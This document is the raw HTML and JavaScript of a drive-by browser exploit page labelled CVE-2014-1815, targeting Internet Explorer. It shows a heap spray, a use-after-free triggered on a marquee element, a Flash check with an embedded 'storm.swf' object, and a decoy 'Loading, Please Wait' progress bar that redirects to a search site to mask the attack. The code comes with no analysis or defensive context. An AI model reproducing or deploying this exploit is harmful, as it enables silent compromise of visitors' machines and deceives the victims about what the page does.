CVE-2014-1815 Html code

1. 1: < !doctype html>
2. 2: < html>
3. 3: < head>
4. 4: < meta http-equiv="Cache-Control" content="no-cache"/>
5. 5: < sc​ript >
6. 6: func​tion stc()
7. 7: {
8. 8: var Then = new Date();
9. 9: Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
10. 10: document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
11. 11: }
12. 12: func​tion cid()
13. 13: {
14. 14: var swf = 0;
15. 15: try {
16. 16: swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
17. 17: }
18. 18: if (!swf)
19. 19: return 0;
20. 20: var cookieString = new String(document.cookie);
21. 21: if(cookieString.indexOf("d93kaj3Nja3") == -1)
22. 22: {stc(); return 1;}else{ return 0;}
23. 23: }
24. 24: String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);}
25. 25: var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1);
26. 26: var ll=new Array();
27. 27: for (i=0;i< 3333;i++)ll.push(document.create​Element("img"));
28. 28: for(i=0;i< 3333;i++) ll[i].className=tpx;
29. 29: for(i=0;i< 3333;i++) ll[i].className="";
30. 30: CollectGarbage();
31. 31: func​tion b2()
32. 32: {
33. 33: try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){}
34. 34: try{xdd.outerText='';}catch(exception){}
35. 35: CollectGarbage();
36. 36: for(i=0;i< 3333;i++) ll[i].className=tpx;
37. 37: }
38. 38: func​tion a1(){
39. 39: if (!cid())
40. 40: return;
41. 41: document.body.contentEditable="true";
42. 42: try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){}
43. 43: try{document.selection.createRange().select();}catch(exception){}
44. 44: }
45. 45: < / sc​ript >
46. 46: < /head>
47. 47: < body onload='setTimeout("a1();",2000);' onresize=b2()>
48. 48: < marquee id=xdd > < /marquee>
49. 49: < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
50. 50: < param name="movie" value="storm.swf" />
51. 51: < param name="quality" value="high" />
52. 52: < param name="bgcolor" value="#ffffff" />
53. 53: < param name="allowScriptAccess" value="sameDomain" />
54. 54: < param name="allowFullScreen" value="true" />
55. 55: < /object>
56. 56: < /body>
57. 57: < body>
58. 58: < form name=loading>
59. 59: ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font>
60. 60: ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
61. 61: ¡¡¡¡
62. 62: ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
63. 63: ¡¡¡¡< sc​ript > ¡¡
64. 64: var bar=0¡¡
65. 65: var line="||"¡¡
66. 66: var amount="||"¡¡
67. 67: count()¡¡
68. 68: func​tion count(){¡¡
69. 69: bar=bar+2¡¡
70. 70: amount =amount + line¡¡
71. 71: document.loading.chart.value=amount¡¡
72. 72: document.loading.percent.value=bar+"%"¡¡
73. 73: if (bar< 99)¡¡
74. 74: {setTimeout("count()",500);}¡¡
75. 75: else¡¡
76. 76: {window.location = "http://www.google.com.hk";}¡¡
77. 77: }< / sc​ript >
78. 78: ¡¡< /p>
79. 79: < /form>
80. 80: < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p>
81. 81: < /body>
82. 82: < /html>